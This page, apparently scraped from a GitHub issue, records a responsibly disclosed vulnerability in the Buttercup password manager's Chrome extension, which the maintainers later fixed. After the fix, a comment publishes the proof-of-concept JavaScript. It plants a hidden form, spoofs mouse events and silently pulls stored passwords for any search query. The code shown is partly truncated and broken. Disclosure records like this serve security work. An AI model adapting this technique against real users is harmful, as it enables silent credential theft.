Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

Security Vulnerabilty when browsing compromised sites

See original GitHub issue

With the Chrome extension installed, any web page can query the password store without the user’s permission.

I’ve written a getPassword function that works like so:

const password = await getPassword('');
// 'mysecretpassword'

I know this is still beta but it’s had over 1K downloads on the Chrome Web Store so probably best not to post my source publicly. What’s the best way to contact you privately with more information?

Update: This has now been resolved. Full disclosure here:

Issue Analytics

  • State:closed
  • Created 6 years ago
  • Comments:14 (7 by maintainers)

github_iconTop GitHub Comments

lukechildscommented, Mar 14, 2018

No problem, congrats on getting the fix out.

For anyone interested or looking how to prevent this kind of attack, the original message I sent in private explaining the exploit is below:

Ok, so this is my source code for the getPassword function:​

const getPassword = query => new Promise(async resolve => {
  const waitForElem = selector => new Promise(resolve => {
    const interval = setInterval(() => {
      const elem = document.querySelector(selector);
      if(elem) {
    }, 100);

  const body = await waitForElem('body');
  const container = document.createElement('div');
  container.innerHTML = `
      [data-buttercup-role="container"] {
        display: none;
    <form class="buttercup-password-stealer">
      <input name="password" type="password">
      <input type="submit">

  const password = await waitForElem('.buttercup-password-stealer [data-buttercup-input="password"]');
  password.dispatchEvent(new MouseEvent('mousemove', { clientX: 99999999 }));
  password.dispatchEvent(new MouseEvent('click'));

  container.querySelector('[type="submit"]').onclick = e => {

  const search = await waitForElem('[data-buttercup-role="container"] input');
  search.value = query;
  search.dispatchEvent(new CustomEvent('input'));

  const entry = await waitForElem('[data-buttercup-role="listbox"] div div');;

When the function is called it’ll inject a hidden password form into the DOM, wait for Buttercup to detect it, spoof some mouse events that will trigger the popup to open, search for the user supplied query in the Buttercup popup, listen for the form submit event and capture the password value, then clean everything up and remove the DOM elements. ​ It requires no user interaction, doesn’t stop normal usage of Buttercup and doesn’t display anything visible on page or do anything to raise suspicion. It executes in a few hundred milliseconds and can run arbitrary search queries against the password store. ​ e.g: ​

// Specific URL
const githubPassword = await getPassword('');
// 'mysecretpassword'

// Fuzzy search
const cryptoExchangePassword = await getPassword('bitcoin');
// 'mysecretpassword'
perry-mitchellcommented, Jan 17, 2018

Planning on releasing tomorrow… So hopefully this will end up in production soon. Firefox update may be slower due to historically poor review performance on their part.

Read more comments on GitHub >

github_iconTop Results From Across the Web

10 Common Web Security Vulnerabilities - Toptal
Don't suffer through a security breach—take action before any problems arise. Master these 10 common web security vulnerabilities now.
Read more >
Why Browser Vulnerabilities Are a Serious Threat
Hackers use multiple techniques to exploit browser vulnerabilities. Occasionally, they will discover a vulnerability that enables them to ...
Read more >
Top 6 web browser attacks and how to avoid them
Web browsers are tempting targets for malicious actors. In this post we look at the most common web browser attacks and how to...
Read more >
Top Five Vulnerabilities Attackers Use Against Browsers
Here are the most common web browser security vulnerabilities to watch out for: Code Execution Exploits in the Browser ...
Read more >
Securing Your Web Browser - US-CERT - CISA
We have observed new software vulnerabilities being exploited and directed at web browsers through use of compromised or malicious websites.
Read more >

github_iconTop Related Medium Post

No results found

github_iconTop Related StackOverflow Question

No results found

github_iconTroubleshoot Live Code

Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free

github_iconTop Related Reddit Thread

No results found

github_iconTop Related Hackernoon Post

No results found

github_iconTop Related Tweet

No results found

github_iconTop Related Post

No results found

github_iconTop Related Hashnode Post

No results found